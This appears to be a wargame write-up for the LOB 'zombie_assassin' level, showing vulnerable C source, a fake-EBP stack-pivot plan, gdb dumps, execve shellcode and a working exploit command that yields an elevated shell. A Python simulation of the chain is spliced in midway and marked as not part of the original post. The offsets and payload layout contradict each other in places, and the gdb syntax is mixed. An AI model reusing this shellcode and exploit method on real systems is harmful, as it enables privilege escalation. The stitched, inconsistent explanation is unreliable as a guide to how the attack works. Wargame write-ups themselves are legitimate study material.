2017. 11. 20. 21:09 · SystemHacking/LOB (BOF Expedition)
assassin / pushing me away
[assassin@localhost assassin]$ /bin/bash2
[assassin@localhost assassin]$ export SHELL=/bin/bash2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[40];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // byte 47 is the top byte of the saved-eip slot: reject stack (0xbf) and libc (0x40) addresses
    if(argv[1][47] == '\xbf')
    {
        printf("stack retbayed you!\n");
        exit(0);
    }

    if(argv[1][47] == '\x40')
    {
        printf("library retbayed you, too!!\n");
        exit(0);
    }

    // strncpy instead of strcpy!
    // still copies 48 bytes into a 40-byte buffer: saved ebp and saved eip are overwritten
    strncpy(buffer, argv[1], 48);
    printf("%s\n", buffer);
    return 0;
}
hint : Fake EBP
[ Stack ]
buffer      40 bytes
saved ebp    4 bytes
saved eip    4 bytes  <-- no stack, no RTL
[ Stack ] : Fake EBP attack
buffer      &shellcode
saved ebp   &buffer+4
saved eip   &leaveret
....
1> main leave
mov esp,ebp
pop ebp => EBP: Fake EBP
2> main ret
pop eip => EIP: &leaveret
3> leave
mov esp,ebp => ESP: Fake EBP (&buffer+4)
pop ebp => EBP: the value stored at &buffer+4
4> ret
pop eip => EIP: &buffer
* &leaveret
0x80484df <main+159>: leave
* 24byte shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
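To make steps 1> to 4> concrete, here is a small model of that leave/ret chain, added here and not part of the original post. It uses the addresses from this writeup (buffer at 0xbffffaa0 as seen in gdb, the leave;ret gadget at main+159 = 0x080484df) and the layout sketched above (buffer starts with &shellcode, fake ebp = &buffer - 4), and also mirrors the two byte-47 checks from the source so you can see why a stack or libc return address is refused while the gadget passes.

```python
import struct

# Constructed from the writeup's values: buffer at 0xbffffaa0 (gdb) and the
# leave;ret gadget at main+159. This is a model of the chain, not the binary.
BUFFER = 0xbffffaa0
LEAVE_RET = 0x080484df

def make_payload(ret_addr, fake_ebp=BUFFER - 4, buffer_addr=BUFFER):
    """48-byte argv[1] in the writeup's layout: buffer[0:4] = &shellcode,
    36 filler bytes, then the fake ebp and the return-address slot."""
    body = struct.pack("<I", buffer_addr + 4) + b"\x90" * 36
    return body + struct.pack("<I", fake_ebp) + struct.pack("<I", ret_addr)

def retbay_check(payload):
    """Mirror zombie_assassin.c: byte 47 is the top byte of the return slot
    and may be neither 0xbf (stack) nor 0x40 (libc)."""
    if len(payload) < 48:
        return None
    if payload[47] == 0xbf:
        return "stack retbayed you!"
    if payload[47] == 0x40:
        return "library retbayed you, too!!"
    return None

def load_frame(payload, buffer_addr=BUFFER):
    """Place the 48 copied bytes as dwords at buffer..buffer+44: strncpy
    copies 48 bytes into the 40-byte buffer, spilling onto both slots."""
    return {buffer_addr + 4 * i: struct.unpack_from("<I", payload, 4 * i)[0]
            for i in range(12)}

def leave_ret(mem, ebp):
    """One 'leave; ret': mov esp,ebp / pop ebp / pop eip -> (eip, ebp).
    Words outside the modeled frame read as 0 (unknown stack contents)."""
    esp = ebp
    ebp = mem.get(esp, 0); esp += 4
    eip = mem.get(esp, 0); esp += 4
    return eip, ebp

def trace_fake_ebp(payload, buffer_addr=BUFFER):
    """Run main's epilogue, then the gadget if that is where ret landed.
    Returns (final eip, [(stage, eip, ebp), ...])."""
    mem = load_frame(payload, buffer_addr)
    eip, ebp = leave_ret(mem, buffer_addr + 40)   # main: ebp -> saved-ebp slot
    steps = [("main leave;ret", eip, ebp)]
    if eip == LEAVE_RET:
        eip, ebp = leave_ret(mem, ebp)             # gadget: esp = fake EBP
        steps.append(("gadget leave;ret", eip, ebp))
    return eip, steps
```

With the writeup's layout the second ret pops the word at &buffer, which is &shellcode, so the trace ends with eip = 0xbffffaa4.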
[ gdb analysis ]
[assassin@localhost assassin]$ cp zombie_assassin zombie_assassin.cp
[assassin@localhost assassin]$ gdb -q zombie_assassin.cp
(gdb) set disassembly-flavor intel
(gdb) disas main
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %ebp,%esp
0x8048443 <main+3>: sub %esp,40
... (omitted) ...
0x80484df <main+159>: leave
(gdb) run $(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "BBBB" + "CCCC"')
Breakpoint 1, 0x80484df in main ()
(gdb) x/24x $ebp-40
0xbffffaa0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab0: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xbffffac0: 0x99e18953 0x80cd0bb0 0x42424242 0x43434343
                                  ^fake ebp  ^saved eip
0xbffffad0: 0x00000002 0xbffffb14 0xbffffb20 0x40013868
* overwrite the value in the fake ebp slot with 0xbffffaa0 - 4
* overwrite the value in the saved eip slot with the address of &leaveret
$(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x9c\xfa\xff\xbf" + "\xdf\x84\x04\x08"')
[ Writing the payload ]
* &leaveret
0x80484df <main+159>: leave
* 24byte shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
=> Address adjustment: the fake ebp value shifted slightly (0xbffffa9c in gdb, 0xbffffa98 outside it)
[assassin@localhost assassin]$ ./zombie_assassin $(python -c 'print "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x98\xfa\xff\xbf" + "\xdf\x84\x04\x08"')
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒ᙰ
̀▒▒▒▒߄
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$